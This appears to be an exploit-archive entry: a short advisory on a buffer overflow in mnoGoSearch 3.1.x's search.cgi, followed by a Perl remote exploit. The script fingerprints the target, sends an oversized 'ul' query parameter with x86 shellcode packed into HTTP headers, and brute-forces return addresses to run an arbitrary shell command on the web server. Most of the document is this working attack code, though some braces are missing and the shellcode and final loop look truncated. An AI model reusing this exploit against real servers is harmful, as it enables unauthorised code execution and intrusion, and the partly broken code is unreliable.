MNOGoSearch 3.1.20 - 'search.cgi?UL' Remote Buffer Overflow (1)












mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

# [ reloaded ] 
# v2.0
# mnogosearch 3.1.x ( exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, 
#	kerengge_kurus, b0iler and d'scan clanz.
# Shout to:
#	#mybsd, #mylinux, #vuln
# Special thanks:
#	Skywizard of mybsd
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1): 
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)

use IO::Socket;

$host = "";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;

if ($ARGV[0]){
	$host = $ARGV[0];	
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d' scan clanz\n\n";
	print "Usage:\n host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";

if ($ARGV[1]){
	$cmd = $ARGV[1];	
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
if ($ARGV[3]){
	$port = int($ARGV[3]);	
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);

sub check_version {
	my $result;
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
	close $conn;

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
#########~~ end function ~~#########

for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	if ($success == 1){
	sleep 1;

# generate shellcode